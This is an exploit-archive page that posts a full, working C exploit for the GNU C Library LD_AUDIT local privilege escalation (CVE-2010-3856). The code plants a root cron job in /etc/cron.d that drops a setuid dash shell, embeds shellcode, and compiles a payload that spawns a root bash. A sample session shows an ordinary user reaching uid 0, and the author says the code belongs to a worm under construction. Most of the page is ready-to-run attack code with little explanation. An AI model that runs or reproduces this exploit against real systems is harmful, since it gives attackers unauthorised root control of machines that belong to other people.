what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GNU C Library Local Root Exploit

GNU C Library Local Root Exploit
Posted Dec 5, 2010
Authored by tempe_mendoan | Site devilzc0de.org

GNU C library (glibc) local root exploit (uid=0,gid=0) that leverages a ld.so arbitrary DSO loading via LD_AUDIT vulnerability.

tags | exploit, arbitrary, local, root
advisories | CVE-2010-3856
SHA-256 | a166f09637f10d8f9c395ecc8e4a485484727fbc73b491608d365b355986f067

GNU C Library Local Root Exploit

Change Mirror Download
/**
#Exploit Title: GNU C Library local root (uid=0,gid=0) exploit
#date: 04-12-10
#author: devilzc0de
#bugs found by: Tavis Ormandy (taviso@sdf.lonestar.org)
# Tested on: Debian GNU/Linux 5.0
#CVE: 2010-3856
#vulnerable : GNU C library
a basic exploit made by: devilzc0de (www.devilzc0de.org)
special thanks to all devilzc0de crews and members, glodhaxors crews and members
tis is part of my worm (currently making dual os worm for 7 months)
mywisdom@DL:~/sploit$ id
uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom)
mywisdom@DL:~/sploit$ ./glibc


GLIBC local privilege escalation exploit

Bugs found by Tavis Ormandy

made by: devilzc0de.org

ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+]waiting for dropped suid shell from our cron daemon, please wait ...
sh-3.2# id
uid=0(root) gid=0(root) groups=1001(mywisdom)
sh-3.2#
**/
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
void salam()
{
printf("\n\nGLIBC local privilege escalation exploit\n");
printf("\nBugs found by Tavis Ormandy\n");
printf("\nmade by: devilzc0de.org\n\n");
}

void eksplo1()
{
int i;
struct stat bufer;
umask(0);
bikin_payload1();
popen("dpkg -S /lib/libpcprofile.so","r");
if(stat("/lib/libpcprofile.so",&bufer)!=0)
{
eksplo2();
}
else
{
popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r");
}

if(stat("/etc/cron.d/w00t",&bufer)!=0)
{
eksplo2();
}
else
{
if(stat("/tmp/suidshell",&bufer)!=0)
{
exit(1);
}
else
{
popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot\n' > /etc/cron.d/w00t", "r");

}
printf("[+]waiting for dropped suid shell from our cron daemon, please wait ...\n");
usleep(60000000);

system("/tmp/./gotroot -c /tmp/./suidshell");
}
}
int bikin_payload1()
{

FILE *fp2;
const char *str2 ="char shellcode[] =\"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\";int main(){int (*f)() = (int(*)())shellcode;f();}";
fp2 = fopen("suid.c", "w");
fwrite(str2, 1, strlen(str2), fp2);
fclose(fp2);
popen("gcc -o /tmp/suidshell suid.c","r");

}

int bikin_payload2()
{

FILE *fp;
const char *str ="void __attribute__((constructor)) init(){ setuid(0);system(\"/bin/bash\");}";
fp = fopen("payload.c", "w");
fwrite(str, 1, strlen(str), fp);
fclose(fp);
popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r");


}

void il_fil_de()
{
struct stat buf;
if(stat("payload.c",&buf)==0)
{
remove("payload.c");
}
if(stat("suid.c",&buf)==0)
{
remove("suid.c");
}
if(stat("/tmp/exploit",&buf)==0)
{

remove("/tmp/exploit");
}

}
int eksplo2()
{

remove("/tmp/exploit");
popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r");
popen("exec 3< /tmp/exploit/target","r");
remove("/tmp/exploit");

bikin_payload2();

popen("LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3","r");

}


int main(int argc,char **argv[])
{

struct stat buf;
salam();
il_fil_de();
mkdir("/tmp/exploit",0777);

if(stat("/etc/cron.d",&buf)!=0)
{
eksplo2();
}
else
{
eksplo1();
}
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close